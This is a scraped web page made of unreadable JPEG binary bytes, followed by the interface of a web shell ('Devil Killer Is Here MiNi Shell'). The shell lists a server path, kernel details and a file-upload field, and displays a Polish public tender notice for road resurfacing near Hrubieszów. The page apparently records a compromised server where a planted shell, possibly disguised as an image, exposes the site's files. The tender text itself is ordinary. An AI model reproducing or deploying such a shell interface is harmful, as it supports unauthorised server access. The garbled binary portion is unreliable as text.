JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230706/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230706/0029349801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> RDW w Hrubieszowie. Remont nawierzchni dw nr 846 odc.<br/>Kukawka - Teratyn od km 21+393 do km 42+549 oraz drogi wojewódzkiej nr 844odc. Białopole - Hrubieszów - Mircze od km 24+951 do km 70+180. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Wojewódzkich w Lublinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019170</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bohdana Dobrzańskiego 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-262</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">846962093</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">846972691</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rdw.hrubieszow@zdw.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdw.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Samorządowa jednostka budżetowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Administracja drogowa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> RDW w Hrubieszowie. Remont nawierzchni dw nr 846 odc.<br/>Kukawka - Teratyn od km 21+393 do km 42+549 oraz drogi wojewódzkiej nr 844odc. Białopole - Hrubieszów - Mircze od km 24+951 do km 70+180. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2017aeb2-1bd9-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00293498</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00090039/16/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.40 RDW w Hrubieszowie. Remont nawierzchni DW nr 846 odc. Kukawka - Teratyn od km 21+393 do km 42+549 oraz DW nr 844 odc. Białopole - Hrubieszów - Mircze od km 24+951 do km 70+180</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdw-lublin.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zdw-lublin.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Każdy Wykonawca może złożyć jedną ofertę. Złożenie więcej niż jednej oferty<br/>spowoduje odrzucenie wszystkich ofert złożonych przez Wykonawcę.<br/>2. Wykonawca przed opracowaniem oferty powinien dokładnie zapoznać się z<br/>charakterystyką i zakresem zamówienia. Ewentualne uwagi i niejasności powinien<br/>zgłosić Zamawiającemu poprzez Platformę. Zaleca się przeprowadzenie przez<br/>Wykonawcę wizji lokalnej.<br/>3. Do upływu terminu składania ofert wykonawca może wycofać ofertę. Sposób<br/>postępowania w takim przypadku został opisany w Instrukcji korzystania z Platformy<br/>pod linkiem https://zdw-lublin.logintrade.net/rejestracja/instrukcje.html.<br/>4. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym, podpisem osobistym lub<br/>kwalifikowanym podpisem elektronicznym w formatach danych określonych w<br/>przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o<br/>informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2023r. poz. 57), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, z uwzględnieniem rodzaju przekazywanych danych. W przypadku jeżeli Wykonawca składa ofertę w formie elektronicznej (tj. opatrzoną kwalifikowanym podpisem elektronicznym), Zamawiający rekomenduje podpisywanie oferty, oświadczeń oraz innych dokumentów tzw. podpisem wewnętrznym, znajdującym się wewnątrz pliku podpisywanego (np. podpis w formacie XAdES, używany do podpisywania plików w PDF). To oznacza, że tak podpisany dokument jest przekazywany zamawiającemu jako jeden plik.<br/>5. Sposób złożenia oferty w tym zaszyfrowania oferty opisany został w Instrukcji użytkownika dostępnej na Platformie pod linkiem https://zdwlublin.<br/>logintrade.net/rejestracja/instrukcje.html. Wykonawca zobowiązany jest do<br/>zapoznania się z treścią ww. Instrukcji przed złożeniem oferty. Składając ofertęWykonawca akceptuje treść ww. Instrukcji.<br/>6. Do oferty należy dołączyć wszystkie dokumenty wymienione w pkt. XVII 5. ppkt 1)-4)SWZ<br/>7. Zamawiający nie żąda wskazania przez Wykonawcę, w ofercie, części zamówienia,których wykonanie zamierza powierzyć Podwykonawcom, którzy nie są podmiotami udostępniającymi zasoby, oraz podania nazw ewentualnych Podwykonawców.8. Wykonawca w ofercie może zastrzec informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. 2022 poz. 1233,). Zamawiający nie ujawni informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli wykonawca, wraz z przekazaniem takich informacji, zastrzegł, że nie mogą być one udostępniane oraz wykazał, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa.9. Wykonawca nie może zastrzec informacji, o których mowa w art. 222 ust. 5 ustawy udostępnianych na stronie internetowej prowadzonego postępowania, niezwłocznie<br/>po otwarciu ofert.Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (tekst. jedn. z 2022 r. poz. 1233.), które<br/>Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa, powinny zostać złożone w odpowiednio wydzielonym i oznaczonym pliku.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz.<br/>UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/> administratorem Pani/Pana danych osobowych jest Dyrektor ZDW w Lublinie, ul. Bohdana<br/>Dobrzańskiego 3, 20-262 Lublin.<br/>z inspektorem danych osobowych Zarządu Dróg Wojewódzkich w Lublinie można<br/>skontaktować się za pomocą e-maila: iod@zdw.lublin.pl*<br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego: RDW w Hrubieszowie.prowadzonym w trybie podstawowym.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych<br/>jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">R3.ST.371.14.2023.rp</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 85083520,93 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 260000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane polegające na remoncie nawierzchni na drogach wojewódzkich nr 846 i nr 844<br/>w tym<br/>1) Droga wojewódzka nr 846 odc. Kukawka - Teratyn od km 21+393 do km 42+549 a) Wykonanie frezowania nawierzchni średnia grubość 10 cm, w ilości 800 m2 , wraz z odwozem urobku na teren OD w Hrubieszowie ul. Nowa<br/>b) Oczyszczenie i skropienie pod warstwę wiążącą w ilości 800 m2<br/>c) wykonania warstwy wiążącej z mieszanki mineralno-asfaltowej AC 16 W 35/50 KR3-4 o grubości minimalnej 6 cm w ilości 800 m2<br/>d) Oczyszczenie i skropienie pod warstwę ścieralną w ilości 800 m2<br/>e) Wykonanie warstwy ścieralnej z mieszanki mineralno - asfaltowej AC11S 50/70KR 3-4 o gr min 4 cm w ilości 800 m2<br/>2) Droga wojewódzka nr 844 odc. Białopole - Hrubieszów - Mircze od km 24+951 do km 70+180a) Wykonanie frezowania nawierzchni średnia grubość 10 cm w ilości 200 m2, , wraz z odwozem urobku na teren OD w Hrubieszowie ul. Nowa<br/>b) Oczyszczenie i skropienie pod warstwę wiążącą w ilości 200 m2<br/>c) wykonania warstwy wiążącej z mieszanki mineralno-asfaltowej AC 16 W 35/50 KR 3-4 o grubości minimalnej 6 cm w ilości 200 m2<br/>d) Oczyszczenie i skropienie pod warstwę ścieralną w ilości 200 m2<br/>e) Wykonanie warstwy ścieralnej z mieszanki mineralno - asfaltowej AC11S 50/70 KR 3-4 o gr min 4 cm w ilości 200 m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Na podstawie óświadczeń</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki<br/>udziału w postępowaniu dotyczące: zdolności technicznej lub zawodowej<br/>Zamawiający uzna, że Wykonawca spełnia warunek jeżeli:<br/>1) wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie minimum 1 robotę<br/>budowlaną obejmującą budowę, remont, lub przebudowę (w rozumieniu ustawy z<br/>dnia 7 lipca 1994 r. &#34;Prawo budowlane&#34; tekst jednolity Dz. U. z 2021 r. poz.2351z<br/>późn. zmianami), nawierzchni wykonanej w technologii betonu asfaltowego o<br/>wartości robót co najmniej<br/>300 000,00 zł (brutto) i oświadczy, że robota ta została wykonana należycie<br/>(Załącznik B1) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenia stanowiące<br/>potwierdzenie, że Wykonawca na dzień składania ofert:nie podlega wykluczeniu wzór zał C, G , H</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenia stanowiące<br/>potwierdzenie, że Wykonawca na dzień składania ofert:spełnia warunki udziału w postępowaniu wzór zał. B,B1</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych w ramach niniejszego postępowania przetargowego z zastrzeżeniem pkt. III ust 4.Przedmiot zamówienia został opisany w sposób określony w art. 101 ust. 1 pkt 2<br/>oraz ust. 3, ustawy PZP. Zamawiający dopuszcza rozwiązania równoważne<br/>opisywanym pod warunkiem, że Wykonawca udowodni w ofercie, w szczególności<br/>za pomocą przedmiotowych środków dowodowych, o których mowa w art. 104-<br/>107, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> ofertę przetargową (z ceną netto i z podatkiem VAT) (Załącznik A).<br/>2) oświadczenia, o których mowa w pkt VIII. 1. SWZ;<br/>3) Zobowiązanie lub inne dokumenty, o których mowa w pkt IX. 4 SWZ (jeżeli<br/>dotyczy).<br/>4) Potwierdzenie umocowania do działania w imieniu Wykonawcy lub podmiotu<br/>udostępniającego zasoby:<br/>a) Wykonawca lub podmiot udostępniający zasoby w celu potwierdzenia, że osoba<br/>działająca w imieniu Wykonawcy lub podmiotu udostępniającego zasoby jest<br/>umocowana do jego reprezentowania, składa wraz z ofertą odpis lub informację z<br/>Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru;<br/>b) Wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia<br/>dokumentów, o których mowa w lit a), jeżeli zamawiający może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał<br/>dane umożliwiające dostęp do tych dokumentów.<br/>c) jeżeli w imieniu Wykonawcy lub podmiotu udostępniającego zasoby działa osoba,<br/>której umocowanie do jego reprezentowania nie wynika z dokumentów, o których<br/>mowa w lit a), Zamawiający żąda od Wykonawcy lub podmiotu udostępniającego<br/>zasoby złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu<br/>potwierdzającego umocowanie do reprezentowania Wykonawcy lub podmiotu<br/>udostępniającego zasoby.<br/>6. Pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego (jeżeli dotyczy).<br/>7. Pełnomocnictwo, o którym mowa w pkt XVI. ppkt. 5) lit c) i pkt6. SWZ składa się, pod<br/>rygorem nieważności w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości:<br/>3 900,00 zł (słownie trzy tysiące dziewięćset złotych 00/100)<br/>Wadium może być wnoszone w jednej lub kilku następujących formach zgodnie z art. 97,<br/>ust. 7 ustawy Prawo zamówień publicznych:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 1 ust. 1<br/>Obwieszczenia Marszałka Sejmu Rzeczypospolitej Polskiej z dnia 14 września<br/>2022 r. w sprawie ogłoszenia jednolitego tekstu ustawy o utworzeniu Polskiej<br/>Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2022 r. poz. 2080 z późn.<br/>zmianami).<br/>15<br/>Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek<br/>bankowy ZDW w Lublinie w Banku PKO Bank Polski S.A. na nr konta: 74 1020 3147<br/>0000 8002 0105 5730 z adnotacją: RDW w Hrubieszowie. Remont nawierzchni<br/>drogi wojewódzkiej nr 846 odc. Kukawka - Teratyn od km 21+393 do km 42+549<br/>oraz drogi wojewódzkiej nr 844 odc. Białopole - Hrubieszów - Mircze od km<br/>24+951 do km 70+180.<br/>Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które<br/>zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem<br/>terminu składania ofert.<br/>1. W ofercie należy złożyć dokument potwierdzający wniesienie wadium.<br/>2. W przypadku wniesienia wadium w jednej z form wymienionych w ust. 2 pkt b)-d)<br/>Beneficjenta poręczenia/gwarancji należy określić następująco: Województwo<br/>Lubelskie, ul. A. Grottgera 4, 20-029 Lublin, Zarząd Dróg Wojewódzkich w Lublinie,<br/>ul. Bohdana Dobrzańskiego 3, 20-262 Lublin.<br/>3. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w<br/>pkt 2 lit b)-d), Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub<br/>poręczenia, w postaci elektronicznej poprzez Platformę.<br/>4. W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej<br/>lub poręczenia, gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i<br/>płatne na pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z<br/>obowiązującymi przepisami.<br/>5. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie<br/>do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w<br/>art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>6. Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim<br/>przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania Ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>oświadczenia, o których mowa 